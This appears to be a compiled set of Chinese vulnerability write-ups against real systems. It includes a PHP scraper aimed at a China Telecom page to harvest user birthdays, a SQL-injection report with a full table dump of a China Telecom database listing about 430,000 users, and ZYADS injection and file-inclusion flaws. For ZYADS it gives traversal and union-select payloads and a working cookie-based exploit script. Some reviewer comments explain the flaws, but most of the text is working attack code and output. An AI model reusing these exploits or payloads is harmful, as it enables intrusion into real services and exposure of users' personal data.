';return '';}$mystr = 'userName='.$username.'&srcUrl=www.baidu.com&policyId=1375&srcIp='.randip().'&type=0';$mystr = base64_encode($mystr);$url = '121.32.136.50:701/gz_20141028/guangzhou/20141028/thirdconfirm.aspx?param=AB'.$mystr;// echo $url;// $html = file_get_contents($url);$myc = curl_init();$headers = array( 'User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:28.0) Gecko/0101 Firefox/28.0', 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3', 'Connection: Keep-Alive ', 'DNT: 1', ); curl_setopt($myc, CURLOPT_HEADER, false); curl_setopt($myc, CURLOPT_HTTPHEADER,$headers); curl_setopt($myc, CURLOPT_URL,$url); curl_setopt($myc, CURLOPT_RETURNTRANSFER,true); curl_setopt($myc, CURLOPT_TIMEOUT, 10); $html = curl_exec($myc); curl_close($myc);if(empty($html)){echo 'contents empty
';return '';}$html = getCon($html, 'UserBirthday“>', '', true);echo $html;}main();?>经测试,发现是Oracle数据库解决方案:过滤啊篇2:运营商安全之中国电信某站SQL注入(涉及9个库,43万
运营商安全之中国电信某站SQL注入漏洞。存在注入URL：**.**.**.**:9080/home/index.action?recStaff=dldxzqkhb&storeId=13464&systemId=1，参数systemId为注入点，涉及9个库
400多个表,43万用户数据
Database: OTO_JT+--------------------------------+---------+| Table | Entries |+--------------------------------+---------+| ATTRINST | 1491899 || SCHEDULE_JOB_LOG | 1324602 || USERS | 430913 || STORECENT_0512 | 286340 || TB_MINI_PAGE_PICTURE_0512| 159625 || STORECENT | 151211 || TB_MINI_REQUEST_LOG| 129173 || TB_MINI_WEBSITE_LOG| 98924 || CATGPENREL | 90268 || LISTPRICE_0512 | 88093 || OFFER_0512 | 88076 || CATENTRY_0512| 86675 || TB_FR_SERV_CALL_LOG| 73342 || CATENTREL_0512 | 71678 || TB_SM_PRIVGRANTS | 57851 || BP_STEPTASK | 49539 || TB_MINI_TRAN_CONFIG_0512 | 35697 || TB_MINI_WEBSITE_PAGE_0512| 34729 || CPORD_ITEMS | 34380 || BP_TASK| 28874 || ADDRBOOK | 27375 || ORDER_COMMENT| 26679 || PPC_PAYMENT | 26236 || PACK_STATLOG | 25299 || CATENTRY_0918| 24768 || CATENTREL | 22484 || CATENTREL_0922 | 22417 || CATENTREL_0918 | 19134 || PACKITEMS | 18236 || TB_CMS_RESOURCE | 17801 || PROMO_CDPOOL | 17366 || ORDER_APPLYINFO | 16636 || SCHEDULE_BUSIPROC_LOG | 15907 || ORDER_INVOICE| 15655 || TB_CMS_CHANNEL | 14774 || SALEINFO_ITEM| 13682 || ORDERITEMS_0512 | 11304 || CPORD_CRM_SUB| 11024 || LISTPRICE | 11018 || OFFER | 11002 || CATENTRY | 9488 || PROMO_USAGE | 9418 || CRM_PROCESS_ORDERS | 9412 || TB_PM_OPER_LOG | 9194 || CPORD_WAIT_SENDBACK_HIST | 8936 || TB_MINI_WEBSITE_STYLE_0512 | 8268 || TB_MINI_WEBSITE_STYLE_0428 | 8226 || TB_MINI_PAGE_PICTURE | 8096 || TB_MINI_PAGE_ATTR_0512 | 6696 || PHONENUMBER | 6564 || TB_SM_STAFFPOST_0512 | 6491 || STAT_ORDERITEMS_SETTLEMENT | 6226 || TB_SM_STAFFPOST_20150428 | 6117 || USER_LOGIN_LOG | 5980 || PACKINFO | 5790 || TB_SM_MINI_PRIVGRANTS | 5658 || TB_SM_MINI_PRIVGRANTS_0512 | 5570 || TB_SM_MINI_PRIVGRANTS_20150506 | 5568 || TB_MINI_PUBLISH_TASK_HIST| 5314 || USERREG| 5183 || USERPROF | 5182 || SHIPINFO | 5164 || ADDRESS| 5163 || INVENTORY | 5102 || TB_SM_MINI_PRIVGRANTS_20150428 | 5050 || TB_SM_SYSSTAFF_0512| 4845 || ORDER_CATENTRY_REL_0512 | 4843 || ORDERS_0512 | 4632 || TB_SM_LOGINSESS | 4560 || TB_SM_SYSSTAFF_20150428 | 4506 || 
TB_MINI_CAT_TYPE | 4480 || PROMO_ELEATTR_INST | 4116 || STOREPMD | 3946 || CPORD_CRM_APPLY | 3882 || TB_MINI_STAFF_REC_0512 | 3874 || STOREPMD_0512| 3824 || ORDERITEM_ADJUST | 3736 || ORDER_ADJUST | 3729 || ORDERITEMS_0918 | 3397 || CPORD_CALL_LOG | 3379 || TB_MINI_WEBSITE_STYLE_0918 | 3223 || TB_SM_LOGINSESS_HIST | 3163 || STOREPMD_20150428 | 3148 || TB_MINI_REGION | 3147 || TB_MINI_REGION_20150428 | 3147 || STORERELA_0512 | 3107 || STORE_0512 | 3063 || TB_MINI_PAGE_TEXT_0512 | 2813 || SALEINFO_REG | 2800 || STORERELA_20150428 | 2742 || STORE_20150428 | 2695 || TB_MINI_WEBSITE_0512 | 2629 || TB_MINI_WEBSITE_20150428 | 2592 || PROMO_ELERELA| 2549 || TB_MINI_WEBSITE_PAGE | 2373 || STORERELA_0918 | 2262 || STORE_0918 | 2220 || TB_SM_WORKPOST | 2125 || TB_MINI_PAGE_ATTR_0918 | 2104 || STOREPMD_0918| 2068 || CATGROUP | || TB_SM_SYSSTAFF_0918| 1968 || TB_MINI_REPORT | 1877 || TB_SM_MINI_PRIVGRANTS_0918 | 1771 || PPC_PAYINST | 1707 || TB_MINI_WEBSITE_LOG_0512 | 1619 || CATGRPREL | 1504 || STORECGRP | 1459 || CATENTRY_RELA| 1453 || TB_MINI_STAFF_REC_0918 | 1433 || ORDER_CATENTRY_REL_0918 | 1423 || STAT_ORDERS_SETTLEMENT | 1421 || TB_MINI_TRAN_CONFIG| 1407 || UPLOADFILE | 1383 || ORDERS_0918 | 1226 || TB_FR_ANALY_CUST_LOGIN | 1145 || ORDERITEMS | 1099 || IP_LATN_RELA | 1018 || TB_MINI_WEBSITE_0918 | 1016 || TB_MINI_QUESTION_DETAIL | 933 || TB_SM_SYSSTAFF | 905 || TB_SM_STAFFPOST | 887 || TB_MINI_ANALYSE | 800 || TB_MINI_PAGE_TEXT_0918 | 771 || PRIZE | 700 || INV_ADJUST | 685 || ORDER_CATENTRY_REL | 631 || CPORD_ASSIGNMENT | 604 || STORERELA | 599 || STORE | 554 || PNB_CHECK_INFO | 487 || TB_MINI_WEBSITE_STYLE. 486 || MODCOMPS_ACTION | 476 || CPORD_COMMENT| 471 || TB_PC_DICT | 466 || TB_MINI_PAGE_ATTR | 449 || SHPARRANGE | 442 || TMP_ACTION_LINK | 423 || TB_MINI_STAFF_WEBSITESTYLE. 
408 || ACTION_LINK | 393 || CATEN_CRM_RELA | 382 || STAT_PPC_PAYINST | 381 || TB_SM_ORGAN | 358 || TB_PC_CITY | 326 || TB_PC_CITY_20150428| 325 || CITY | 323 || CITY_20150428| 323 || PROMO_TRIGGER| 319 || PRIZE_CODE_SEQ | 318 || TB_MINI_ARTICLE | 313 || FRAME_TB_CONFIG_CONTENT | 305 || PNB_STATLOG | 274 || CALLBACK_ORDER_RELA| 273 || TB_SM_MODCOMPS | 260 || ORDERS | 255 || PLAN_INFO_SETTING | 247 || ATTRIBUTE | 230 || FRAME_TB_INTERFACE_INIT_PARA | 229 || TB_FR_SERV_USER_AUTH | 226 || TB_FR_SERV_METHOD | 215 || TB_MINI_STAFF_REC | 211 || TB_SM_SYSMENU| 191 || TB_MINI_QUESTION_CUST | 187 || CALCODE| 174 || TB_SM_ERRLOGIN | 167 || TB_MINI_EXCEL_LOG | 154 || PROMO_ADDINFO| 152 || PROMOTION | 152 || CATEN_CRM_EQPT | 148 || ORDER_STATLOG| 145 || TB_SM_WORKPOST_20150428 | 144 || ORDER_CATEN_SOLD | 140 || SMS_SEND_QUEUE_HIST| 139 || TB_SM_MODULE | 135 || CALLBACKS | 134 || TB_MINI_WEBSITE | 120 || TB_MINI_STANDARD | 119 || SANALY_CATENTRY | 109 || TB_MINI_STAFF_REL_0512 | 104 || EXPORTFILE | 103 || SHIP_STATLOG | 101 || TB_FR_ANALY_ORDER_INFO | 92|| TB_PC_DICTTYPE | 87|| TB_MINI_PAGE_TEXT | 84|| TB_MINI_STAFF_REL_0918 | 83|| BP_TRANS | 77|| TB_MINI_PUBLISH_OBJ_RELA | 74|| ORDER_INVOICE_BAK | 72|| TB_FR_SERVINFO | 69|| ATTRVALUE | 66|| PROMO_STATLOG| 66|| BRAND | 63|| CATCLASS_BRAND | 62|| STAT_DOWNLOAD_FILES| 62|| PROMO_CDUSAGE| 60|| FRAME_TB_CONFIG_TYPE | 56|| TB_MINI_STAFF_REL | 54|| BP_FLOWSTEP | 53|| TB_MINI_QUESTION_TITLE_ITEM | 48|| TEST1 | 48|| PNBINV_WARN | 45|| FRAME_TB_INTERFACE_CONFIG| 44|| TB_MINI_PAGE_TEXT_BAKPAJT| 43|| BP_ACTION | 42|| FFMCENTER | 42|| FRAME_TB_INTERFACE_EVENT | 42|| INV_WARN | 41|| IP_WHITE | 40|| TB_MINI_TALK_ABOUT | 40|| TB_MINI_NOTICE_ROLES | 38|| CATCOMMENT | 36|| CATCOMMT_SCORE | 36|| FFMCENTER_PMD| 35|| TEST2 | 34|| WS_STAFF_SETTING | 33|| PROVINCE | 31|| PROVINCE_20150428 | 31|| TB_MINI_APPROVE | 31|| TB_MINI_PAGE_CAT | 28|| PROMO_ELEATTR| 26|| TB_SM_ORGAN_20150428 | 26|| SHIPMODE | 25|| SCHEDULE_JOB | 24|| TB_PC_LOG_CONFIG | 24|| 
PROMO_CDSPEC | 23|| STORECAT | 23|| TMP_CATGROUP | 23|| FRAME_TB_SM_ORGAN | 22|| SUPPLIER | 22|| QTYUNIT| 21|| TB_SM_ORGTYPE| 21|| ATTRVALUE_TYPE | 20|| BP_STEP| 20|| TB_MINI_QUESTION_TITLE | 19|| PROMO_ELEMENT| 18|| SANALY_TYPE | 18|| SHIPMENT_PAYMENT_LISTS | 18|| UPLOADFILE_SETTING | 18|| SEARCH_FILTER_ATTG_CHANNELREL | 17|| CATCLASS | 15|| TB_CMS_ARTICLE | 15|| ATTRGRP| 14|| TB_CMS_PUBLISH_TASK_HIST | 14|| ACTIVITY | 13|| TB_MINI_PAGE | 13|| PPC_PAYMETHOD| 12|| PRIZE_RESULT | 11|| SEARCH_FILTER_ATTRGROUPREL | 11|| SEARCH_FILTER_ATTRS| 11|| TB_CMS_PUBLISH_TASK| 11|| ORDER_BSNTYPE| 10|| ORDER_BSNTYPE_FLOW | 10|| PNB_CHECK_INFO_HIST| 10|| SHIPPER| 10|| TB_CMS_RESOURCE_LOG| 10|| TB_MINI_NOTICE | 10|| ”CATALOG“ | 9 || PROMO_PUBCD | 9 || SEARCH_FILTER_GROUP| 9 || TB_CMS_APPROVE | 9 || TB_CMS_APPROVE_ACT | 9 || PROMO_PROMOTYPE | 8 || TB_CMS_ARTICLE_EXTATTR | 8 || TB_MINI_QUESTION_CONF | 8 || BP_FLOW| 7 || LISTS_RECORDS| 7 || TMP_ROLE_POST| 7 || CATACT_RELA | 6 || SEARCH_FILTER_GROUPS | 6 || SEARCH_FILTER_GROUPSREL | 6 || SYS_ID_SERIAL| 6 || TB_CMS_APPREVENT_PRIVI | 6 || TB_MINI_QUESTION | 6 || TB_MINI_WEBSITE_SYN_HIST | 6 || TB_CMS_TEMPLATE_ATTR | 5 || TB_MINI_STYLE_SYSTEM | 5 || TB_MINI_WX_TOKEN | 5 || REFUNDMENT_LISTS | 4 || SEARCH_FILTER_USAGE| 4 || TB_MINI_PUBLISH_TASK | 4 || BP_BUSITYPE | 3 || CPORD_WAIT_ACCNBR | 3 || FRAME_TBSYSTEMSTATICVALUE| 3 || PNB_LOCKED | 3 || PNB_RESERVE | 3 || PROMO_GROUP | 3 || SEARCH_FILTER_MATCH_TYPE | 3 || SEND_TEMPLATE| 3 || TB_CMS_ARTICLE_ATTRVALUE | 3 || TB_CMS_RESOURCE_PAGE | 3 || TB_CMS_TEMPLATE | 3 || TB_MINI_STYLE. 
3 || TB_SM_ORGAN_HIST | 3 || BP_FLOWRULE | 2 || EXPORTFILE_SETTING | 2 || OBJCACHE_SETTING | 2 || PAYMENT_LISTS| 2 || STAGEPAY_CHECK | 2 || TB_MINI_WEBSITE_TEMPLATE | 2 || CALRULE| 1 || CALVALUE | 1 || CPORD_WAIT_SENDBACK| 1 || FRAME_TB_FILTER_PARAM | 1 || FRAME_TB_FILTER_URL| 1 || PRIZE_RATE | 1 || SHPAREA| 1 || TB_CMS_TAG | 1 || TB_CMS_TAG_RELA | 1 || TB_FR_SERV_USER | 1 || TB_MINI_PICTUREMANAGER | 1 |+--------------------------------+---------+
修复方案：过滤

篇3：中易广告联盟系统(ZYADS) SQL注入和本地包含漏洞
中易广告联盟系统(ZYADS) sql注入和本地包含漏洞
在index/news.php 1-31行include_once(”top.php“);
// Vulnerable excerpt from index/news.php (ZYADS), quoted as found. The curly
// quotes (” “) and the broken quoting on the $newssql line are extraction
// artefacts of the original double quotes, not part of the shipped code.
$newsid = intval($_GET['id']);            // cast to int, so this value alone is safe to concatenate
$to_type = addslashes($_GET['type']);     // addslashes only escapes quotes; the value is compared, never embedded in SQL
// $to_type_s is assigned only inside the three branches below. For any other
// value of type (or no type parameter at all) it is never initialised in this
// file, so whatever it already holds is spliced verbatim into the query —
// presumably a same-named request variable when register_globals is on
// (PHP < 5.4), which is what the write-up below relies on.
// Fix: `$to_type_s = '';` before this chain, and pass the id as a bound
// parameter instead of building the statement by concatenation.
if ($to_type=='index')
{
$to_type_s =” and to_type=1“;
}
if ($to_type=='webuser')
{
$to_type_s =” and to_type!=3“;
}
if ($to_type=='webadver')
{
$to_type_s =” and to_type!=2“;
}
// Injection sink: $to_type_s is appended to the statement unescaped.
$newssql = 'select * from zyads_news WHERE `id` ='' . $newsid . ''
'.$to_type_s.'';
$newsre=$db->query($newssql);             // $db is not defined in this excerpt; presumably set up by the included top.php
$newsrow = $db->fetch_array($newsre);
if (empty($newsrow)){
zyads_message('zyads_news');              // project helper, defined elsewhere
}
?>
可以看到，$to_type 未定义或者不等于 index、webuser、webadver 时，$to_type_s 是没有定义的。
这时候我们就可以提交一个$to_type_s变量来进行sql注入,简单的注入,呵呵。
在/code/adview_cpa_html.php 1-46行
/*********************/
/* */
/* Version : 5.1.0 */
/* Author : RM */
/* Comment : 071223 */
/* */
/*********************/
// Vulnerable excerpt from /code/adview_cpa_html.php (ZYADS), quoted as found.
// Identifiers of the form _obfuscate_<base64> are the vendor's obfuscated
// names; the suffixes decode to "client", "getip", "getbrowse", "getos" and
// "passport_encrypt" where they are plain base64. Curly quotes are an
// extraction artefact of the original double quotes.
_obfuscate_JQYdYn1jfBI( );                  // obfuscated call; purpose not recoverable from this listing
define( ”IN_ZYADS“, TRUE );
// Four parameters read raw from the query string; the only check applied to
// them is the empty() test below.
$name = $_GET['name'];
$adid = $_GET['adid'];
$offsetwidth = $_GET['offsetwidth'];
$site = $_GET['site'];
$click_url = ”www.erzhi.cn“;
$count_url = ”www.erzhi.cn“;
// empty() rejects only missing, "" and "0" values; it places no constraint on
// the content, so path separators and ".." pass straight through.
if ( empty( $name ) || empty( $adid ) || empty( $site ) )
{
exit( ”广告出错“ );
}
// Local file inclusion sink #1: $name is spliced into the include path
// unchecked. The leading @ also suppresses the warning a failed include would
// raise, which hides the failure from the server log. Mitigation: validate
// the value against an allow-list (e.g. ctype_alnum) or basename() it before
// building the path.
@require( ”../user/c/“.$name.”/user_info.php“ );
require( ”../include/soft_class.php“ );
require( ”../include/settings.php“ );
$code = new _obfuscate_Y2xpZW50( );
$getip = $code->_obfuscate_Z2V0aXA( );
$getbrowse = $code->_obfuscate_Z2V0YnJvd3Nl( );
$getos = $code->_obfuscate_Z2V0b3M( );
$maketime = time( ) + $setting['zyads_date'] * 3600;   // $setting is not set in this excerpt; presumably comes from settings.php
$maketime = $maketime;                                   // no-op self-assignment
$strbas = $code->_obfuscate_cGFzc3BvcnRfZW5jcnlwdA(
$getip.”|“.$maketime.”|“.$getbrowse.”|“.$getos, $setting['url_pwd'] );
$strbas = _obfuscate_IGI7aGd_LDRuMD0VZg( $strbas );
// $zyads_users is not set in this excerpt; presumably populated by the
// per-user user_info.php included above, i.e. by the file $name selected.
if ( $zyads_users['flag'] != 2 )
{
echo ”document.write('帐号被锁定');“;
exit( );
}
// Local file inclusion sink #2: $adid builds the cache path. The existence
// check (obfuscated; presumably a file_exists-style test, given the
// "file missing" branch) does not prevent traversal — any existing .php
// reachable through a relative path passes and is then required.
if ( _obfuscate_Cx96BhhwZxABPA8( ”../cache/cpa/“.$adid.”.php“ ) )
{
require( ”../cache/cpa/“.$adid.”.php“ );
}
else
{
exit( ”文件丢失-“.$adid.”.php“ );
}
$name、$adid 这两个变量都能造成本地包含漏洞，
不过$adid好利用点,
exp:/code/adview_cpa_html.php?name=admin&adid=../../index&site=www.xxx.com
最后附上一个exp,只是简单的cookie提交参数 为了隐蔽点 呵呵
//by q1ur3n
//team: www.wolvez.org
//exp : zyads.php?site=www.tx8688.com&id=and 1=2 union select 1,2,3,4,5,6%23
//敏感信息表信息:
/*
DROP TABLE IF EXISTS zyads_admin;
CREATE TABLE zyads_admin (
id int(11) NOT NULL auto_increment,
username varchar(20) NOT NULL,
pwd varchar(50) NOT NULL,
login_num int(11) NOT NULL,
last_time datetime DEFAULT '0000-00-00 00:00:00' NOT NULL,
islock int(1) NOT NULL,
ip varchar(20) NOT NULL,
admin_flag varchar(200) NOT NULL,
addtime datetime NOT NULL,
PRIMARY KEY (id)
);
*/
// Author's proof-of-concept sender for the news.php issue above, quoted as
// found; only reviewer comments are added. Curly quotes are an extraction
// artefact.
$host = $_GET['site'];                                   // target host is taken from this script's own query string
// The injected fragment (this script's id parameter, see the exp comment
// above) is carried in a cookie named to_type_s rather than in the URL or
// body. It only has an effect where the target turns cookies into globals
// (register_globals, removed in PHP 5.4) — presumably why a cookie is used.
// Detection: inspect the Cookie header for unexpected parameter names and
// SQL keywords; rules that look only at the query string and body miss this.
$cmd='to_type_s='.urlencode(stripcslashes($_REQUEST[”id“]));
// Raw HTTP/1.1 request assembled by hand; the browser-like headers are
// cosmetic. The Host header is the only place $host appears in the request.
$message = ”GET /index/news.php?id=89 HTTP/1.1 “;
$message .= ”Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-
shockwave-flash, */* “;
$message .= ”Referer: www.baidu.com/ “;
$message .= ”Accept-Language: zh-cn “;
$message .= ”Content-Type: application/x-www-form-urlencoded “;
$message .= ”User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1) “;
$message .= ”Host: $host “;
$message .= ”Connection: Close “;
$message .= ”Cookie: “.$cmd.” ";
//echo $message;
// Plain TCP to port 80; the response is echoed back verbatim to whoever
// called this script.
$fp = fsockopen($host, 80);
fputs($fp, $message);
$resp = '';
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
echo $resp;
fclose($fp);
?>












